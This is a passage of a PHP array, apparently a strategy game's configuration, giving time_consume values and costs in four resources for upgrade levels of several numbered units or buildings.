array ('time_consume' => 46080, 'resources' => array( '1' => 4540, '2' => 5180, '3' => 4975, '4' => 1005)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5140, '2' => 5860, '3' => 5630, '4' => 1140)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5720, '2' => 6520, '3' => 6265, '4' => 1265)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6285, '2' => 7160, '3' => 6880, '4' => 1390)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6835, '2' => 7790, '3' => 7485, '4' => 1515)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7375, '2' => 8410, '3' => 8080, '4' => 1635)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7910, '2' => 9015, '3' => 8665, '4' => 1750)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8430, '2' => 9610, '3' => 9235, '4' => 1870)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8945, '2' => 10200, '3' => 9800, '4' => 1980)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9455, '2' => 10780, '3' => 10355, '4' => 2095)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9955, '2' => 11350, '3' => 10905, '4' => 2205)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10450, '2' => 11915, '3' => 11445, '4' => 2315)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10940, '2' => 12470, '3' => 11980, '4' => 2425)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11425, '2' => 13020, '3' => 12510, '4' => 2530)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11900, '2' => 13565, '3' => 13035, '4' => 2635)),


'17'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2365, '2' => 735, '3' => 885, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 4120, '2' => 1275, '3' => 1540, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5700, '2' => 1765, '3' => 2125, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 7175, '2' => 2225, '3' => 2680, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 8575, '2' => 2660, '3' => 3200, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 9925, '2' => 3075, '3' => 3705, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 11225, '2' => 3480, '3' => 4190, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 12490, '2' => 3870, '3' => 4660, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 13725, '2' => 4255, '3' => 5125, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 14935, '2' => 4625, '3' => 5575, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 16115, '2' => 4995, '3' => 6015, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 17280, '2' => 5355, '3' => 6450, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 18420, '2' => 5710, '3' => 6875, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 19545, '2' => 6055, '3' => 7295, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 20655, '2' => 6400, '3' => 7710, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 21750, '2' => 6740, '3' => 8115, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 22830, '2' => 7075, '3' => 8520, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 23900, '2' => 7405, '3' => 8920, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 24955, '2' => 7730, '3' => 9315, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 26000, '2' => 8055, '3' => 9705, '4' => 2380)),


'18'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1065, '2' => 1415, '3' => 735, '4' => 95)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1855, '2' => 2465, '3' => 1275, '4' => 170)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2570, '2' => 3410, '3' => 1765, '4' => 235)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3235, '2' => 4295, '3' => 2225, '4' => 295)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3865, '2' => 5135, '3' => 2660, '4' => 350)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4470, '2' => 5940, '3' => 3075, '4' => 405)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5060, '2' => 6720, '3' => 3480, '4' => 460)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5630, '2' => 7475, '3' => 3870, '4' => 510)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6185, '2' => 8215, '3' => 4255, '4' => 560)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6730, '2' => 8940, '3' => 4625, '4' => 610)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7265, '2' => 9645, '3' => 4995, '4' => 660)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7785, '2' => 10340, '3' => 5355, '4' => 705)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8300, '2' => 11025, '3' => 5710, '4' => 750)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8810, '2' => 11700, '3' => 6055, '4' => 800)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9310, '2' => 12365, '3' => 6400, '4' => 845)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9800, '2' => 13020, '3' => 6740, '4' => 890)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10290, '2' => 13665, '3' => 7075, '4' => 930)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10770, '2' => 14305, '3' => 7405, '4' => 975)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11245, '2' => 14935, '3' => 7730, '4' => 1020)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11720, '2' => 15565, '3' => 8055, '4' => 1060)),


'21'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 585, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 1020, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 1410, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 1775, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 2120, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 2455, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 2775, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 3090, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 3395, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 3690, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 3985, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 4270, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 4555, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 4830, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 5105, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 5375, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 5645, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 5905, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 6170, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 6425, '4' => 4065)),


'22'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1080, '2' => 1150, '3' => 1495, '4' => 580)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1880, '2' => 2000, '3' => 2605, '4' => 1010)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2600, '2' => 2770, '3' => 3600, '4' => 1395)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3275, '2' => 3485, '3' => 4530, '4' => 1760)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3915, '2' => 4165, '3' => 5420, '4' => 2100)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4530, '2' => 4820, '3' => 6270, '4' => 2430)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5125, '2' => 5455, '3' => 7090, '4' => 2750)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5700, '2' => 6070, '3' => 7890, '4' => 3060)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6265, '2' => 6670, '3' => 8670, '4' => 3365)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6815, '2' => 7255, '3' => 9435, '4' => 3660)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7355, '2' => 7830, '3' => 10180, '4' => 3950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7885, '2' => 8395, '3' => 10915, '4' => 4235)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8405, '2' => 8950, '3' => 11635, '4' => 4515)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8920, '2' => 9495, '3' => 12345, '4' => 4790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9425, '2' => 10035, '3' => 13045, '4' => 5060)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9925, '2' => 10570, '3' => 13740, '4' => 5330)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10420, '2' => 11095, '3' => 14420, '4' => 5595)),

array ('time_consume' => 132480, 'resources' => array( '1' => 10905, '2' => 11610, '3' => 15095, '4' => 5855)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11385, '2' => 12125, '3' => 15765, '4' => 6115)),

array ('time_consume' => 146880, 'resources' => array( '1' => 11865, '2' => 12635, '3' => 16425, '4' => 6370)),


'23'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 645, '2' => 575, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1125, '2' => 1000, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1555, '2' => 1385, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1955, '2' => 1745, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2335, '2' => 2085, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2705, '2' => 2410, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3060, '2' => 2725, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 3405, '2' => 3035, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3740, '2' => 3335, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 4070, '2' => 3630, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 4390, '2' => 3915, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 4710, '2' => 4200, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 5020, '2' => 4475, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 5325, '2' => 4750, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 5630, '2' => 5020, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 5925, '2' => 5285, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 6220, '2' => 5545, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 6515, '2' => 5805, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 6800, '2' => 6065, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 7085, '2' => 6315, '3' => 1870, '4' => 2415)),


'24'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1275, '2' => 1625, '3' => 905, '4' => 290)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2220, '2' => 2830, '3' => 1575, '4' => 505)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3070, '2' => 3915, '3' => 2180, '4' => 700)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3865, '2' => 4925, '3' => 2745, '4' => 880)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4620, '2' => 5890, '3' => 3280, '4' => 1050)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5345, '2' => 6815, '3' => 3795, '4' => 1215)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6050, '2' => 7710, '3' => 4295, '4' => 1375)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6730, '2' => 8575, '3' => 4775, '4' => 1530)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7395, '2' => 9425, '3' => 5250, '4' => 1680)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8045, '2' => 10255, '3' => 5710, '4' => 1830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8680, '2' => 11065, '3' => 6165, '4' => 1975)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9310, '2' => 11865, '3' => 6605, '4' => 2115)),

array ('time_consume' => 96480, 'resources' => array( '1' => 9925, '2' => 12650, '3' => 7045, '4' => 2255)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10530, '2' => 13420, '3' => 7475, '4' => 2395)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11125, '2' => 14180, '3' => 7900, '4' => 2530)),

array ('time_consume' => 118080, 'resources' => array( '1' => 11715, '2' => 14935, '3' => 8315, '4' => 2665)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12300, '2' => 15675, '3' => 8730, '4' => 2795)),

array ('time_consume' => 132480, 'resources' => array( '1' => 12875, '2' => 16410, '3' => 9140, '4' => 2930)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13445, '2' => 17135, '3' => 9540, '4' => 3060)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14005, '2' => 17850, '3' => 9940, '4' => 3185)),


'25'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1310, '2' => 1205, '3' => 1080, '4' => 500)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2280, '2' => 2100, '3' => 1880, '4' => 870)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3155, '2' => 2900, '3' => 2600, '4' => 1205)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3970, '2' => 3655, '3' => 3275, '4' => 1515)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4745, '2' => 4365, '3' => 3915, '4' => 1810)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5495, '2' => 5055, '3' => 4530, '4' => 2095)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6215, '2' => 5715, '3' => 5125, '4' => 2370)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6915, '2' => 6360, '3' => 5700, '4' => 2640)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7595, '2' => 6990, '3' => 6265, '4' => 2900)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8265, '2' => 7605, '3' => 6815, '4' => 3155)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8920, '2' => 8205, '3' => 7355, '4' => 3405)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9565, '2' => 8795, '3' => 7885, '4' => 3650)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10195, '2' => 9380, '3' => 8405, '4' => 3890)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10820, '2' => 9950, '3' => 8920, '4' => 4130)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11435, '2' => 10515, '3' => 9425, '4' => 4365)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12040, '2' => 11075, '3' => 9925, '4' => 4595)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12635, '2' => 11625, '3' => 10420, '4' => 4825)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13230, '2' => 12170, '3' => 10905, '4' => 5050)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13815, '2' => 12705, '3' => 11385, '4' => 5270)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14390, '2' => 13240, '3' => 11865, '4' => 5495)),


'26'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1200, '2' => 1480, '3' => 1640, '4' => 450)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2090, '2' => 2575, '3' => 2860, '4' => 785)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2890, '2' => 3565, '3' => 3955, '4' => 1085)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3640, '2' => 4485, '3' => 4975, '4' => 1365)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4350, '2' => 5365, '3' => 5950, '4' => 1630)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5030, '2' => 6205, '3' => 6885, '4' => 1885)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5690, '2' => 7020, '3' => 7785, '4' => 2135)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6335, '2' => 7810, '3' => 8665, '4' => 2375)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6960, '2' => 8585, '3' => 9520, '4' => 2610)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7570, '2' => 9340, '3' => 10360, '4' => 2840)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8170, '2' => 10080, '3' => 11180, '4' => 3065)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8760, '2' => 10805, '3' => 11985, '4' => 3285)),

array ('time_consume' => 96480, 'resources' => array( '1' => 9340, '2' => 11520, '3' => 12775, '4' => 3500)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9910, '2' => 12225, '3' => 13560, '4' => 3715)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10475, '2' => 12915, '3' => 14325, '4' => 3925)),

array ('time_consume' => 118080, 'resources' => array( '1' => 11030, '2' => 13600, '3' => 15085, '4' => 4135)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11575, '2' => 14275, '3' => 15835, '4' => 4340)),

array ('time_consume' => 132480, 'resources' => array( '1' => 12115, '2' => 14945, '3' => 16575, '4' => 4545)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12655, '2' => 15605, '3' => 17310, '4' => 4745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 13185, '2' => 16260, '3' => 18035, '4' => 4945)),


'27'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2250, '2' => 1330, '3' => 835, '4' => 230)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3915, '2' => 2315, '3' => 1455, '4' => 400)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5420, '2' => 3200, '3' => 2015, '4' => 550)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6820, '2' => 4025, '3' => 2535, '4' => 690)),

array ('time_consume' => 38880, 'resources' => array( '1' => 8155, '2' => 4815, '3' => 3030, '4' => 825)),

array ('time_consume' => 46080, 'resources' => array( '1' => 9435, '2' => 5570, '3' => 3510, '4' => 955)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10670, '2' => 6300, '3' => 3970, '4' => 1085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11875, '2' => 7010, '3' => 4415, '4' => 1205)),

array ('time_consume' => 67680, 'resources' => array( '1' => 13050, '2' => 7705, '3' => 4850, '4' => 1325)),

array ('time_consume' => 74880, 'resources' => array( '1' => 14195, '2' => 8380, '3' => 5280, '4' => 1440)),

array ('time_consume' => 82080, 'resources' => array( '1' => 15320, '2' => 9045, '3' => 5695, '4' => 1555)),

array ('time_consume' => 89280, 'resources' => array( '1' => 16425, '2' => 9695, '3' => 6110, '4' => 1665)),

array ('time_consume' => 96480, 'resources' => array( '1' => 17510, '2' => 10340, '3' => 6510, '4' => 1775)),

array ('time_consume' => 103680, 'resources' => array( '1' => 18580, '2' => 10970, '3' => 6910, '4' => 1885)),

array ('time_consume' => 110880, 'resources' => array( '1' => 19635, '2' => 11595, '3' => 7300, '4' => 1995)),

array ('time_consume' => 118080, 'resources' => array( '1' => 20675, '2' => 12205, '3' => 7690, '4' => 2100)),

array ('time_consume' => 125280, 'resources' => array( '1' => 21705, '2' => 12815, '3' => 8070, '4' => 2205)),

array ('time_consume' => 132480, 'resources' => array( '1' => 22720, '2' => 13415, '3' => 8450, '4' => 2305)),

array ('time_consume' => 139680, 'resources' => array( '1' => 23725, '2' => 14005, '3' => 8820, '4' => 2410)),

array ('time_consume' => 146880, 'resources' => array( '1' => 24720, '2' => 14595, '3' => 9190, '4' => 2510)),


'28'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1135, '2' => 1710, '3' => 770, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1980, '2' => 2975, '3' => 1340, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2735, '2' => 4115, '3' => 1850, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3445, '2' => 5180, '3' => 2330, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4120, '2' => 6190, '3' => 2785, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4765, '2' => 7165, '3' => 3220, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5390, '2' => 8105, '3' => 3645, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6000, '2' => 9015, '3' => 4055, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6590, '2' => 9910, '3' => 4455, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7170, '2' => 10780, '3' => 4850, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7740, '2' => 11635, '3' => 5230, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8300, '2' => 12470, '3' => 5610, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8845, '2' => 13295, '3' => 5980, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9385, '2' => 14110, '3' => 6345, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9920, '2' => 14910, '3' => 6705, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10445, '2' => 15700, '3' => 7060, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10965, '2' => 16480, '3' => 7410, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11480, '2' => 17250, '3' => 7760, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11985, '2' => 18015, '3' => 8100, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12485, '2' => 18765, '3' => 8440, '4' => 1445)),


'51'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 940, '2' => 800, '3' => 1250, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1635, '2' => 1395, '3' => 2175, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2265, '2' => 1925, '3' => 3010, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2850, '2' => 2425, '3' => 3790, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3405, '2' => 2900, '3' => 4530, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3940, '2' => 3355, '3' => 5240, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4460, '2' => 3795, '3' => 5930, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4960, '2' => 4220, '3' => 6600, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5450, '2' => 4640, '3' => 7250, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5930, '2' => 5050, '3' => 7885, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6400, '2' => 5450, '3' => 8510, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 6860, '2' => 5840, '3' => 9125, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7315, '2' => 6225, '3' => 9730, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 7765, '2' => 6605, '3' => 10325, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8205, '2' => 6980, '3' => 10910, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 8640, '2' => 7350, '3' => 11485, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9065, '2' => 7715, '3' => 12060, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9490, '2' => 8080, '3' => 12620, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 9910, '2' => 8435, '3' => 13180, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10325, '2' => 8790, '3' => 13730, '4' => 4065)),


'52'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 1320, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 2300, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 3180, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 4000, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 4785, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 5535, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 6260, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 6965, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 7655, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 8330, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 8990, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 9635, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 10275, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 10900, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 11520, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 12130, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 12735, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 13330, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 13920, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 14500, '4' => 7140)),


'53'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1150, '2' => 1220, '3' => 1670, '4' => 720)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2000, '2' => 2125, '3' => 2910, '4' => 1255)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2770, '2' => 2940, '3' => 4020, '4' => 1735)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3485, '2' => 3700, '3' => 5060, '4' => 2185)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4165, '2' => 4420, '3' => 6050, '4' => 2610)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4820, '2' => 5115, '3' => 7000, '4' => 3020)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5455, '2' => 5785, '3' => 7920, '4' => 3415)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6070, '2' => 6440, '3' => 8815, '4' => 3800)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6670, '2' => 7075, '3' => 9685, '4' => 4175)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7255, '2' => 7700, '3' => 10535, '4' => 4545)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7830, '2' => 8310, '3' => 11370, '4' => 4905)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8395, '2' => 8905, '3' => 12190, '4' => 5255)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8950, '2' => 9495, '3' => 13000, '4' => 5605)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9495, '2' => 10075, '3' => 13790, '4' => 5945)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10035, '2' => 10645, '3' => 14575, '4' => 6285)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10570, '2' => 11210, '3' => 15345, '4' => 6615)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11095, '2' => 11770, '3' => 16110, '4' => 6945)),

